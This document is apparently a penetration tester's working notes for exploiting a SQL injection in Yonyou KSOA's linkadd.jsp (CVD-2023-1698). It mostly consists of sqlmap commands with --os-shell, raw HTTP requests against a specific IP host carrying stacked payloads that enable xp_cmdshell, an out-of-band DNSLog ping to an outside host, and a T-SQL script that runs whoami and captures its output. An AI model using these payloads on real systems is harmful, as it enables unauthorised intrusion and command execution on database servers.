SQL injection
select * from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell' // returns 1 if xp_cmdshell exists
python .\sqlmap.py -r .\point.txt --proxy socks5://127.0.0.1:7890
Contents of point.txt:
id=666666 is the injection point; the * after it is sqlmap's custom injection marker, so sqlmap tests that position first instead of guessing parameters.
GET /linksframe/linkadd.jsp?id=666666* HTTP/1.1
Host: 1.196.238.71:93
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate
Connection: close
While sqlmap runs you can see what the back-end DBMS is, for example Microsoft SQL Server (MSSQL).
python .\sqlmap.py -r .\point.txt --proxy socks5://127.0.0.1:7890 --os-shell
Use this to see whether there is an OS shell to be had (on MSSQL, --os-shell relies on xp_cmdshell).
python .\sqlmap.py -r .\point.txt --proxy socks5://127.0.0.1:7890 --sql-shell
Use this to get a SQL shell and run SQL statements directly.
http://1.196.238.71:93/linksframe/linkadd.jsp?id=666666';WAITFOR DELAY '0:0:5'--
GET /linksframe/linkadd.jsp?id=666666' union all select 9af,null,sys.fn_sqlvarbasetostr(HashBytes('MD5','GRYFF')),null,null,'33';WAITFOR DELAY '0:0:4'-- HTTP/1.1
Use these requests to test for stacked injection: if the response is delayed by the WAITFOR time, the statement after the semicolon was executed, so stacked queries work.
In the sql-shell, check whether xp_cmdshell exists
select * from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell' // returns 1 if xp_cmdshell exists
Existing is not the same as enabled: xp_cmdshell is present but disabled by default. That is why stacked injection is needed: the option must first be enabled with sp_configure and the configuration then saved with RECONFIGURE, which takes separate statements that cannot be expressed inside a single SELECT.
' union all select 9af,null,sys.fn_sqlvarbasetostr(HashBytes('MD5','GRYFF')),null,null,null;
exec sp_configure 'show advanced options', 1;
reconfigure;
exec sp_configure 'xp_cmdshell',1;
reconfigure;
exec master..xp_cmdshell 'ping 6byyxc.dnslog.cn' --
sys.fn_sqlvarbasetostr converts the varbinary returned by HashBytes into a readable hex string, so the MD5 marker is echoed in the page and you can tell which UNION column is reflected.
The payload must end with a comment (--) so that the rest of the original query is ignored.
GET /linksframe/linkadd.jsp?id=666666'%20union%20all%20select%209af%2cnull%2csys.fn_sqlvarbasetostr(HashBytes('MD5'%2c'GRYFF'))%2cnull%2cnull%2cnull%3bexec%20sp_configure%20'show%20advanced%20options'%2c%201%3breconfigure%3bEXEC%20sp_configure%20'xp_cmdshell'%2c1%3bRECONFIGURE%3b%20--%20 HTTP/1.1
Host: 1.196.238.71:93
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate
Connection: close
GET /linksframe/linkadd.jsp?id=666666'%20union%20all%20select%20null%2cnull%2cnull%2cnull%2cnull%2cnull%3bEXEC%20sp_configure%20'show%20advanced%20options'%2c1%3bRECONFIGURE%3bEXEC%20sp_configure%20'xp_cmdshell'%2c1%3bRECONFIGURE%3b%20-- HTTP/1.1
Host: 1.196.238.71:93
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate
Connection: close
GET /linksframe/linkadd.jsp?id=666666'%20union%20all%20select%20null%2cnull%2cnull%2cnull%2cnull%2cnull%3bCREATE%20TABLE%20cmdtmp%20(dir%20varchar(8000))%3b--%20 HTTP/1.1
Host: 1.196.238.71:93
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate
Connection: close
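The whole procedure from the existence check through capturing command output (the cmdtmp table created in the last request above), as an added T-SQL example that is not from the original page or the 用友 KSOA case. It is meant to be run from sqlmap's --sql-shell or any MSSQL client; the sys.configurations check, the id column on cmdtmp, the whoami command and the placeholder DNSLog hostname are my additions and assumptions. Enabling xp_cmdshell needs sysadmin (or ALTER SETTINGS) on the login the application uses; if the sysobjects query returns a row but sp_configure fails, that is the reason.

```sql
-- Added example, not the original page's payloads. Run in --sql-shell or an MSSQL client.

-- 1. Does the extended stored procedure exist? (xtype 'X' = extended stored procedure)
SELECT name FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell';

-- 2. Existing is not enabled: read the server option. value_in_use = 0 means
--    sp_configure + RECONFIGURE are still required (assumption: login may read sys.configurations).
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- 3. Enable it. Each sp_configure must be followed by RECONFIGURE, so this is a
--    sequence of statements: this is exactly what stacked injection is needed for.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- 4. Blind confirmation via out-of-band DNS (hostname is a placeholder, replace with your own).
EXEC master..xp_cmdshell 'ping -n 1 placeholder.dnslog.example';

-- 5. Get output back when the page does not echo it: capture into a table, then read it.
--    The id column is an assumption added so rows can be read back one at a time.
IF OBJECT_ID('cmdtmp') IS NOT NULL DROP TABLE cmdtmp;
CREATE TABLE cmdtmp (id INT IDENTITY(1,1), line VARCHAR(8000));
INSERT INTO cmdtmp (line) EXEC master..xp_cmdshell 'whoami';
SELECT id, line FROM cmdtmp WHERE line IS NOT NULL ORDER BY id;

-- Through the injection point, put one row into the echoed UNION column instead of the
-- MD5 marker, e.g. (SELECT TOP 1 line FROM cmdtmp WHERE id = 1), and step id per request.

-- 6. Clean up after the test.
DROP TABLE cmdtmp;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
```

Step 3 is the part that must be sent as stacked statements after a syntactically complete UNION SELECT with the right column count, ending in --, as in the raw requests above; steps 1, 2 and 5 can each be folded into the echoed UNION column if no sql-shell is available.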
Also, in this kind of injection the stacked statements often have to be preceded by a complete query (the UNION SELECT part with the correct column count); otherwise the original statement errors out before the stacked part is executed.
Prototype of this SQL injection case:
[9.6 routine optimization] [SQL-to-RCE template] 用友 (Yonyou) KSOA linkadd.jsp SQL injection (CVD-2023-1698).go